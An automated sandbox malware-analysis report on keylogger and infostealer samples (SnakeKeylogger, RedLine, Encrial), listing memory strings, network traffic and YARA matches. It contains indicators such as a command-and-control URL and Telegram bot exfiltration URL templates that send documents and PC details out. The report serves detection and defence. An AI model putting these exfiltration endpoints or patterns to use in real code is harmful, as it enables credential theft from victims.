                      Source: Native_snake01.exe, 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3625599331.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002531000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1233155515.00000000072E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: Native_snake01.exe, 00000013.00000002.3631776048.000000000382D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                      Source: Native_snake01.exe, 00000013.00000002.3626598913.0000000002617000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: Native_snake01.exe, 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3625599331.00000000025AF000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002617000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: Native_New-Nova.exe, 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                      Source: Native_snake01.exe, 00000013.00000002.3626598913.0000000002617000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                      Source: Native_snake01.exe, 00000013.00000002.3626598913.0000000002617000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a
                      Source: Native_snake01.exe, 00000013.00000002.3631776048.000000000382D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: Native_snake01.exe, 0000000C.00000003.2723371653.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3631776048.000000000382D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: Native_snake01.exe, 0000000C.00000003.2723371653.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3631776048.000000000382D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: Native_snake01.exe, 0000000C.00000002.3625599331.00000000025C4000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.000000000263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                      Source: Native_snake01.exe, 00000013.00000002.3631776048.000000000382D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: Native_snake01.exe, 0000000C.00000003.2723371653.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3631776048.000000000382D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                      Source: Native_snake01.exe, 00000013.00000002.3631776048.000000000382D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: svchost.exe, 0000000B.00000003.1206385373.000001DE528C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                      Source: edb.log.11.dr, qmgr.db.11.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                      Source: edb.log.11.dr, qmgr.db.11.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                      Source: edb.log.11.dr, qmgr.db.11.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: svchost.exe, 0000000B.00000003.1206385373.000001DE528C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                      Source: Native_snake01.exe, 00000013.00000002.3631776048.000000000382D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                      Source: svchost.exe, 0000000B.00000003.1206385373.000001DE528C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                      Source: edb.log.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                      Source: Native_New-Nova.exe, 0000000A.00000002.3627009294.00000000026FC000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.00000000025CA000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.00000000025F0000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002617000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                      Source: Native_New-Nova.exe, 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3627009294.00000000026FC000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3625599331.0000000002530000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.00000000025CA000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: Native_snake01.exe, 00000013.00000002.3626598913.0000000002617000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                      Source: Native_snake01.exe, 00000013.00000002.3626598913.00000000025F0000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.00000000025AB000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002617000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                      Source: Native_New-Nova.exe, 0000000A.00000002.3627009294.00000000026FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                      Source: Native_snake01.exe, 0000000C.00000003.2723371653.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3631776048.000000000382D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                      Source: Native_snake01.exe, 0000000C.00000003.2723371653.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3631776048.000000000382D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                      Source: Native_snake01.exe, 0000000C.00000002.3625599331.00000000025C4000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.000000000263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49759 version: TLS 1.2
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_084984E8 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,12_2_084984E8

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 18.2.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.0.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 10.2.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.49c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 12.2.Native_snake01.exe.49c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.49c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.2.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.3.Native_snake01.exe.5e03c0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 19.3.Native_snake01.exe.5e03c0.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.3.Native_snake01.exe.5e03c0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 12.2.Native_snake01.exe.4a50000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 12.2.Native_snake01.exe.4a50000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.4a50000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 12.2.Native_snake01.exe.21c1216.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 12.2.Native_snake01.exe.21c1216.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.21c1216.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.2.Native_snake01.exe.5100000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 19.2.Native_snake01.exe.5100000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.2.Native_snake01.exe.5100000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 19.2.Native_snake01.exe.5100000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 19.2.Native_snake01.exe.5100000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.2.Native_snake01.exe.5100000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 19.2.Native_snake01.exe.4a70f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 19.2.Native_snake01.exe.4a70f20.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.2.Native_snake01.exe.4a70f20.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
